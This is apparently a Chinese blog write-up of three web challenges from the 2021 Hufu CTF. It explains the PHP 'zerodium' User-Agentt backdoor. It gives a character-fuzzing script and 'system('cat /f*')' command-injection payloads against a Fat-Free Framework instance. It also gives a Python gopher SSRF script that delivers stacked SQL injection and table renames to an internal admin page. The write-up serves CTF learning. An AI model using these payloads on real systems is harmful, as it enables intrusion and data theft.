您当前的位置: 首页 > 

yu22x

暂无认证

  • 3浏览

    0关注

    109博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

2021虎符杯web(部分)

yu22x 发布时间:2021-04-04 15:52:57 ,浏览量:3

签到

根据提示直接在网上搜新闻。 在这里插入图片描述

这个后门代码很简单,它被加到zlib扩展里,当发现请求User-Agentt中包含字符串zerodium时,则用eval执行User-Agent第8位字符后内容。黑客大概是希望传入并执行zerodiumphpinfo();这样的内容。

也就是说zerodiumsystem将会有system函数的功能。 payload: 在这里插入图片描述

在这里插入图片描述

unsetme

在网站上下载下来源码,修改index.php后本地搭建。 开启报错后爆出关键内容 在这里插入图片描述 找到代码位置 在这里插入图片描述 其中$key为我们传入的a的内容. 过程是unset触发__unset 接着进入offsetunset 最后进入clear函数。 在这里插入图片描述 在这里插入图片描述

现在的目的就是绕过函数。 在这里插入图片描述 懒得分析了,直接测试几个常见的。打印一下输出

在这里插入图片描述 直接跑一遍字符

import requests
from urllib.parse import quote

url="http://127.0.0.1/fatfree/index.php?a="
for i in range(128):
	if("1))"  in requests.get(url+"1"+quote(chr(i))+"1)").text):
		print(quote(chr(i)))
输出
%0A
%5B
%5D

也就是说%0a 、 [ 、] 直接随便拿一个就可以绕过了。 在这里插入图片描述 payload1 a=1[1]);system('cat /f*');// payload2 a=1%0a);system('cat /f*');//

慢慢做管理系统

根据提示直接扔密码

ffifdyop
129581926211651571912466741651878684928

发现第二个可以用 进入gopher页面 在这里插入图片描述 过滤了file http://,看来就是想让我们用gopher了。 构造ssrf的payload

import requests
from urllib.parse import quote
cmd="username=1'||1#&password=123"
url="http://eci-2zecqhthq774sc0sy6u0.cloudeci1.ichunqiu.com/"
sess=requests.session()
r1=sess.get(url+'?password=129581926211651571912466741651878684928')
data='''POST /admin.php HTTP/1.1
Host: eci-2zecqhthq774sc0sy6u0.cloudeci1.ichunqiu.com
Content-Type:application/x-www-form-urlencoded
Content-Length: '''+str(len(cmd))+'''

'''+cmd+'''

'''
data=quote(data)
data=data.replace('%0a','%0d%0a')
print(url+"/ssrf.php?way=gopher://127.0.0.1:80/_"+quote(data))
r2=sess.get(url+"/ssrf.php?way=gopher://127.0.0.1:80/_"+quote(data))
print(r2.text)

在这里插入图片描述 经过尝试发现过滤了select等关键字,然后发现可以堆叠注入,直接show tables 看下。 在这里插入图片描述

说明我们要的用户名密码再第二个表里面,但是查询的是第一个。 类似于19年强网杯的随便注。直接修改表名。

cmd="username=1'||1;rename table `fake_admin` to `a`;rename table `real_admin_here_do_you_find` to `fake_admin`;;#&password=password"

接着直接一句话查出来真正的用户名密码 cmd="username=1'||1#&password=password" 在这里插入图片描述 得到用户名密码,然后怎么也进不去flag.php 把admin_inner改成admin就可以了。。。。。。。。。。。。。。。。 在这里插入图片描述

cmd="username=admin&password=5fb4e07de914cfc82afb44vbaf402203"

在这里插入图片描述 修改cookie直接访问flag.php就可以了 在这里插入图片描述

关注
打赏
1617522777
查看更多评论
立即登录/注册

微信扫码登录

0.0465s